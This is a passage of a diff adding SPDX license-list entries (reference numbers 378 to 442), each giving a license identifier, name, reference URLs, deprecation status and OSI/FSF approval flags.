+ {
+ "reference": "https://spdx.org/licenses/RPL-1.5.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPL-1.5.json",
+ "referenceNumber": 378,
+ "name": "Reciprocal Public License 1.5",
+ "licenseId": "RPL-1.5",
+ "seeAlso": [
+ "https://opensource.org/licenses/RPL-1.5"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.json",
+ "referenceNumber": 379,
+ "name": "BSD 2-Clause FreeBSD License",
+ "licenseId": "BSD-2-Clause-FreeBSD",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/freebsd-license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-Modern-Variant.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-Modern-Variant.json",
+ "referenceNumber": 380,
+ "name": "MIT License Modern Variant",
+ "licenseId": "MIT-Modern-Variant",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:MIT#Modern_Variants",
+ "https://ptolemy.berkeley.edu/copyright.htm",
+ "https://pirlwww.lpl.arizona.edu/resources/guide/software/PerlTk/Tixlic.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Nokia.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Nokia.json",
+ "referenceNumber": 381,
+ "name": "Nokia Open Source License",
+ "licenseId": "Nokia",
+ "seeAlso": [
+ "https://opensource.org/licenses/nokia"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.json",
+ "referenceNumber": 382,
+ "name": "GNU Free Documentation License v1.1 only - no invariants",
+ "licenseId": "GFDL-1.1-no-invariants-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PDDL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PDDL-1.0.json",
+ "referenceNumber": 383,
+ "name": "Open Data Commons Public Domain Dedication \u0026 License 1.0",
+ "licenseId": "PDDL-1.0",
+ "seeAlso": [
+ "http://opendatacommons.org/licenses/pddl/1.0/",
+ "https://opendatacommons.org/licenses/pddl/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.0.json",
+ "referenceNumber": 384,
+ "name": "European Union Public License 1.0",
+ "licenseId": "EUPL-1.0",
+ "seeAlso": [
+ "http://ec.europa.eu/idabc/en/document/7330.html",
+ "http://ec.europa.eu/idabc/servlets/Doc027f.pdf?id\u003d31096"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDDL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDDL-1.1.json",
+ "referenceNumber": 385,
+ "name": "Common Development and Distribution License 1.1",
+ "licenseId": "CDDL-1.1",
+ "seeAlso": [
+ "http://glassfish.java.net/public/CDDL+GPL_1_1.html",
+ "https://javaee.github.io/glassfish/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.3-only.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-only.json",
+ "referenceNumber": 386,
+ "name": "GNU Free Documentation License v1.3 only",
+ "licenseId": "GFDL-1.3-only",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/fdl-1.3.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.6.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.6.json",
+ "referenceNumber": 387,
+ "name": "Open LDAP Public License v2.6",
+ "licenseId": "OLDAP-2.6",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d1cae062821881f41b73012ba816434897abf4205"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/JSON.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/JSON.json",
+ "referenceNumber": 388,
+ "name": "JSON License",
+ "licenseId": "JSON",
+ "seeAlso": [
+ "http://www.json.org/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-or-later.json",
+ "referenceNumber": 389,
+ "name": "GNU Lesser General Public License v3.0 or later",
+ "licenseId": "LGPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
+ "https://opensource.org/licenses/LGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-3.0.json",
+ "referenceNumber": 390,
+ "name": "GNU General Public License v3.0 only",
+ "licenseId": "GPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
+ "https://opensource.org/licenses/GPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Fair.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Fair.json",
+ "referenceNumber": 391,
+ "name": "Fair License",
+ "licenseId": "Fair",
+ "seeAlso": [
+ "http://fairlicense.org/",
+ "https://opensource.org/licenses/Fair"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-font-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-font-exception.json",
+ "referenceNumber": 392,
+ "name": "GNU General Public License v2.0 w/Font exception",
+ "licenseId": "GPL-2.0-with-font-exception",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/gpl-faq.html#FontException"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-2.1.json",
+ "referenceNumber": 393,
+ "name": "Open Software License 2.1",
+ "licenseId": "OSL-2.1",
+ "seeAlso": [
+ "http://web.archive.org/web/20050212003940/http://www.rosenlaw.com/osl21.htm",
+ "https://opensource.org/licenses/OSL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.3a.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.3a.json",
+ "referenceNumber": 394,
+ "name": "LaTeX Project Public License v1.3a",
+ "licenseId": "LPPL-1.3a",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-3a.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NAIST-2003.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NAIST-2003.json",
+ "referenceNumber": 395,
+ "name": "Nara Institute of Science and Technology License (2003)",
+ "licenseId": "NAIST-2003",
+ "seeAlso": [
+ "https://enterprise.dejacode.com/licenses/public/naist-2003/#license-text",
+ "https://github.com/nodejs/node/blob/4a19cc8947b1bba2b2d27816ec3d0edf9b28e503/LICENSE#L343"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.json",
+ "referenceNumber": 396,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 4.0 International",
+ "licenseId": "CC-BY-NC-ND-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.json",
+ "referenceNumber": 397,
+ "name": "Creative Commons Attribution Non Commercial 3.0 Germany",
+ "licenseId": "CC-BY-NC-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1+.json",
+ "referenceNumber": 398,
+ "name": "GNU Library General Public License v2.1 or later",
+ "licenseId": "LGPL-2.1+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OPL-1.0.json",
+ "referenceNumber": 399,
+ "name": "Open Public License v1.0",
+ "licenseId": "OPL-1.0",
+ "seeAlso": [
+ "http://old.koalateam.com/jackaroo/OPL_1_0.TXT",
+ "https://fedoraproject.org/wiki/Licensing/Open_Public_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/HPND-sell-variant.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HPND-sell-variant.json",
+ "referenceNumber": 400,
+ "name": "Historical Permission Notice and Disclaimer - sell variant",
+ "licenseId": "HPND-sell-variant",
+ "seeAlso": [
+ "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/sunrpc/auth_gss/gss_generic_token.c?h\u003dv4.19"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/QPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/QPL-1.0.json",
+ "referenceNumber": 401,
+ "name": "Q Public License 1.0",
+ "licenseId": "QPL-1.0",
+ "seeAlso": [
+ "http://doc.qt.nokia.com/3.3/license.html",
+ "https://opensource.org/licenses/QPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.2.json",
+ "referenceNumber": 402,
+ "name": "European Union Public License 1.2",
+ "licenseId": "EUPL-1.2",
+ "seeAlso": [
+ "https://joinup.ec.europa.eu/page/eupl-text-11-12",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl_v1.2_en.pdf",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/2020-03/EUPL-1.2%20EN.txt",
+ "https://joinup.ec.europa.eu/sites/default/files/inline-files/EUPL%20v1_2%20EN(1).txt",
+ "http://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri\u003dCELEX:32017D0863",
+ "https://opensource.org/licenses/EUPL-1.2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.json",
+ "referenceNumber": 403,
+ "name": "GNU Free Documentation License v1.2 or later - no invariants",
+ "licenseId": "GFDL-1.2-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/eCos-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/eCos-2.0.json",
+ "referenceNumber": 404,
+ "name": "eCos license version 2.0",
+ "licenseId": "eCos-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/ecos-license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NCGL-UK-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NCGL-UK-2.0.json",
+ "referenceNumber": 405,
+ "name": "Non-Commercial Government Licence",
+ "licenseId": "NCGL-UK-2.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/non-commercial-government-licence/version/2/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Beerware.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Beerware.json",
+ "referenceNumber": 406,
+ "name": "Beerware License",
+ "licenseId": "Beerware",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Beerware",
+ "https://people.freebsd.org/~phk/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.json",
+ "referenceNumber": 407,
+ "name": "BSD 3-Clause Open MPI variant",
+ "licenseId": "BSD-3-Clause-Open-MPI",
+ "seeAlso": [
+ "https://www.open-mpi.org/community/license.php",
+ "http://www.netlib.org/lapack/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.json",
+ "referenceNumber": 408,
+ "name": "GNU General Public License v2.0 w/Bison exception",
+ "licenseId": "GPL-2.0-with-bison-exception",
+ "seeAlso": [
+ "http://git.savannah.gnu.org/cgit/bison.git/tree/data/yacc.c?id\u003d193d7c7054ba7197b0789e14965b739162319b5e#n141"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-B.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-B.json",
+ "referenceNumber": 409,
+ "name": "CeCILL-B Free Software License Agreement",
+ "licenseId": "CECILL-B",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.json",
+ "referenceNumber": 410,
+ "name": "GNU General Public License v2.0 w/Autoconf exception",
+ "licenseId": "GPL-2.0-with-autoconf-exception",
+ "seeAlso": [
+ "http://ac-archive.sourceforge.net/doc/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPL-2.0.json",
+ "referenceNumber": 411,
+ "name": "Eclipse Public License 2.0",
+ "licenseId": "EPL-2.0",
+ "seeAlso": [
+ "https://www.eclipse.org/legal/epl-2.0",
+ "https://www.opensource.org/licenses/EPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-feh.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-feh.json",
+ "referenceNumber": 412,
+ "name": "feh License",
+ "licenseId": "MIT-feh",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#feh"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPL-1.1.json",
+ "referenceNumber": 413,
+ "name": "Reciprocal Public License 1.1",
+ "licenseId": "RPL-1.1",
+ "seeAlso": [
+ "https://opensource.org/licenses/RPL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Permissive-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-1.0.json",
+ "referenceNumber": 414,
+ "name": "Community Data License Agreement Permissive 1.0",
+ "licenseId": "CDLA-Permissive-1.0",
+ "seeAlso": [
+ "https://cdla.io/permissive-1-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Python-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Python-2.0.json",
+ "referenceNumber": 415,
+ "name": "Python License 2.0",
+ "licenseId": "Python-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Python-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-1.0.json",
+ "referenceNumber": 416,
+ "name": "Mozilla Public License 1.0",
+ "licenseId": "MPL-1.0",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/MPL-1.0.html",
+ "https://opensource.org/licenses/MPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-or-later.json",
+ "referenceNumber": 417,
+ "name": "GNU Free Documentation License v1.1 or later",
+ "licenseId": "GFDL-1.1-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/diffmark.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/diffmark.json",
+ "referenceNumber": 418,
+ "name": "diffmark license",
+ "licenseId": "diffmark",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/diffmark"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0+.json",
+ "referenceNumber": 419,
+ "name": "GNU General Public License v1.0 or later",
+ "licenseId": "GPL-1.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OpenSSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OpenSSL.json",
+ "referenceNumber": 420,
+ "name": "OpenSSL License",
+ "licenseId": "OpenSSL",
+ "seeAlso": [
+ "http://www.openssl.org/source/license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-1.0.json",
+ "referenceNumber": 421,
+ "name": "Open Software License 1.0",
+ "licenseId": "OSL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/OSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Parity-6.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Parity-6.0.0.json",
+ "referenceNumber": 422,
+ "name": "The Parity Public License 6.0.0",
+ "licenseId": "Parity-6.0.0",
+ "seeAlso": [
+ "https://paritylicense.com/versions/6.0.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0.json",
+ "referenceNumber": 423,
+ "name": "Affero General Public License v1.0",
+ "licenseId": "AGPL-1.0",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/YPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/YPL-1.1.json",
+ "referenceNumber": 424,
+ "name": "Yahoo! Public License v1.1",
+ "licenseId": "YPL-1.1",
+ "seeAlso": [
+ "http://www.zimbra.com/license/yahoo_public_license_1.1.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSH-short.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSH-short.json",
+ "referenceNumber": 425,
+ "name": "SSH short notice",
+ "licenseId": "SSH-short",
+ "seeAlso": [
+ "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/pathnames.h",
+ "http://web.mit.edu/kolya/.f/root/athena.mit.edu/sipb.mit.edu/project/openssh/OldFiles/src/openssh-2.9.9p2/ssh-add.1",
+ "https://joinup.ec.europa.eu/svn/lesoll/trunk/italc/lib/src/dsa_key.cpp"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IBM-pibs.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IBM-pibs.json",
+ "referenceNumber": 426,
+ "name": "IBM PowerPC Initialization and Boot Software",
+ "licenseId": "IBM-pibs",
+ "seeAlso": [
+ "http://git.denx.de/?p\u003du-boot.git;a\u003dblob;f\u003darch/powerpc/cpu/ppc4xx/miiphy.c;h\u003d297155fdafa064b955e53e9832de93bfb0cfb85b;hb\u003d9fab4bf4cc077c21e43941866f3f2c196f28670d"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Xnet.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Xnet.json",
+ "referenceNumber": 427,
+ "name": "X.Net License",
+ "licenseId": "Xnet",
+ "seeAlso": [
+ "https://opensource.org/licenses/Xnet"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TU-Berlin-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TU-Berlin-1.0.json",
+ "referenceNumber": 428,
+ "name": "Technische Universitaet Berlin License 1.0",
+ "licenseId": "TU-Berlin-1.0",
+ "seeAlso": [
+ "https://github.com/swh/ladspa/blob/7bf6f3799fdba70fda297c2d8fd9f526803d9680/gsm/COPYRIGHT"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0.json",
+ "referenceNumber": 429,
+ "name": "GNU Affero General Public License v3.0",
+ "licenseId": "AGPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CAL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CAL-1.0.json",
+ "referenceNumber": 430,
+ "name": "Cryptographic Autonomy License 1.0",
+ "licenseId": "CAL-1.0",
+ "seeAlso": [
+ "http://cryptographicautonomylicense.com/license-text.html",
+ "https://opensource.org/licenses/CAL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-3.0.json",
+ "referenceNumber": 431,
+ "name": "Academic Free License v3.0",
+ "licenseId": "AFL-3.0",
+ "seeAlso": [
+ "http://www.rosenlaw.com/AFL3.0.htm",
+ "https://opensource.org/licenses/afl-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-C.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-C.json",
+ "referenceNumber": 432,
+ "name": "CeCILL-C Free Software License Agreement",
+ "licenseId": "CECILL-C",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-3.0.json",
+ "referenceNumber": 433,
+ "name": "Open Government Licence v3.0",
+ "licenseId": "OGL-UK-3.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Clear.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Clear.json",
+ "referenceNumber": 434,
+ "name": "BSD 3-Clause Clear License",
+ "licenseId": "BSD-3-Clause-Clear",
+ "seeAlso": [
+ "http://labs.metacarta.com/license-explanation.html#license"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Modification.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Modification.json",
+ "referenceNumber": 435,
+ "name": "BSD 3-Clause Modification",
+ "licenseId": "BSD-3-Clause-Modification",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:BSD#Modification_Variant"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.json",
+ "referenceNumber": 436,
+ "name": "Creative Commons Attribution Share Alike 2.0 England and Wales",
+ "licenseId": "CC-BY-SA-2.0-UK",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.0/uk/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Saxpath.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Saxpath.json",
+ "referenceNumber": 437,
+ "name": "Saxpath License",
+ "licenseId": "Saxpath",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Saxpath_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLPL.json",
+ "referenceNumber": 438,
+ "name": "No Limit Public License",
+ "licenseId": "NLPL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/NLPL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SimPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SimPL-2.0.json",
+ "referenceNumber": 439,
+ "name": "Simple Public License 2.0",
+ "licenseId": "SimPL-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/SimPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/psfrag.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/psfrag.json",
+ "referenceNumber": 440,
+ "name": "psfrag License",
+ "licenseId": "psfrag",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/psfrag"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-86.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-86.json",
+ "referenceNumber": 441,
+ "name": "Spencer License 86",
+ "licenseId": "Spencer-86",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OCCT-PL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OCCT-PL.json",
+ "referenceNumber": 442,
+ "name": "Open CASCADE Technology Public License",
+ "licenseId": "OCCT-PL",
+ "seeAlso": [
+ "http://www.opencascade.com/content/occt-public-license"
+ ],
